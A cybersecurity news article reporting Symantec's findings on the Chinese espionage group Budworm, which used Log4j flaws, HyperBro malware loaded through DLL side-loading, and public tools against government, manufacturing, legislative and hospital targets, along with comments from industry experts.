​​Budworm espionage group resurfaces using Log4j vulnerabilities in recent attacks, Symantec reveals

Budworm espionage group resurfaces using Log4j vulnerabilities in recent attacks, Symantec reveals

A Chinese espionage group Budworm has launched recent attacks across continents, including the first confirmed attacks seen against the U.S. in many years, Symantec researchers revealed on Thursday. In recent attacks, Budworm leveraged the Log4j vulnerabilities to compromise the Apache Tomcat service on servers to install web shells. Additionally, the attackers used Virtual Private Servers (VPS) hosted on Vultr and Telstra as command-and-control (C&C) servers.

“The Budworm espionage group has mounted attacks over the past six months against a number of strategically significant targets, including the government of a Middle Eastern country, a multinational electronics manufacturer, and a U.S. state legislature,” Symantec’s Threat Hunter Team wrote in a company blog post. “The latter attack is the first time in a number of years Symantec has seen Budworm targeting a U.S-based entity. Along with the above high-value targets, the group also conducted an attack against a hospital in South East Asia.”

The researchers added that Budworm is known for mounting ambitious attacks against high-value targets. “While there were frequent reports of Budworm targeting U.S. organizations six to eight years ago, in more recent years, the group’s activity appears to have been largely focused on Asia, the Middle East, and Europe. However, this is the second time in recent months, Budworm has been linked to attacks against a U.S-based target.”

Earlier this month, U.S. cybersecurity agencies released a joint Cybersecurity Advisory (CSA) detailing the top Common Vulnerabilities and Exposures (CVEs) used by People’s Republic of China (PRC) state-sponsored cyber hackers since 2020. Among the 20 vulnerabilities the Chinese hackers have exploited since 2020 are the Apache Log4j, Pulse Connect Secure, Atlassian, F5 Big-IP, VMware vCenter Server, Hikvision Webserver, and about three Microsoft remote code execution security loopholes.

The researchers said that the main payload continues to be the HyperBro malware family, which is often loaded using a dynamic-link library (DLL) side-loading technique. “This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found. The attacker then runs the legitimate application (having installed it themselves). The legitimate application then loads and executes the payload,” they added.

In recent attacks, Symantec said that Budworm has used the endpoint privilege management software CyberArk Viewfinity to perform side-loading. The binary, which has the default name vf_host[dot]exe, is usually renamed by the attackers to masquerade as a more innocuous file. Masqueraded names included securityhealthservice[dot]exe, secu[dot]exe, vfhost[dot]exe, vxhost[dot]exe, vx[dot]exe, and v[dot]exe, it added.

The researchers said that, in some cases, the HyperBro backdoor was loaded with its HyperBro loaders, such as peloader[dot]exe and 12[dot]exe. It is designed to load malicious DLLs and encrypt payloads. “While HyperBro was frequently used, the attackers also used the PlugX/Korplug Trojan as a payload at times,” they added.

Some of the other tools used in recent attacks include Cobalt Strike, an off-the-shelf tool that can be used to load shellcode onto victim machines. It has legitimate uses as a penetration testing tool but is frequently exploited by malicious actors. The researchers also identified use of LaZagne, a publicly available credential dumping tool, and IOX, a publicly available proxy, and port-forwarding tool. Hackers also used the Fast Reverse Proxy (FRP) tool, and publicly available intranet scanning Fscan tool.

In another cybersecurity advisory, U.S. cybersecurity agencies disclosed the use of Impacket and Exfiltration tool to steal sensitive information from a defense industrial base (DIB) organization. Additionally, from November last year through January, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a DIB sector organization’s enterprise network. The advisory, however, did not clarify why the information was being made after several months.

Commenting on the Budworm group, Roger Grimes, data-driven defense evangelist at KnowBe4, wrote in an emailed statement that this is the current state of affairs, every sufficiently capable nation is committing unauthorized actions on its adversaries. “What’s changed in the last decade is how these nation-state actions are in both quantity, impact, and number of targets.”

Grimes said that in the past, most nation-state actors compromised targets associated with their adversary’s government and military. “Now, today, the most common nation-state target is traditional organizations not directly aligned with governments or the military, although certainly governments and militaries are still greatly targeted,” he added.

“Cyberattacks originating from nation states have many distinguishing features from those of run-of-the-mill cybercrime groups,” Chris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, wrote in an emailed statement. “First, their attacks are usually more strategic in nature, picking specific targets and information as objectives. Second, because the goals of nation-state actors align more with traditional espionage objectives like data theft or sabotage, those threat actors take more care to avoid detection to conceal their presence for as long as possible.” 

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related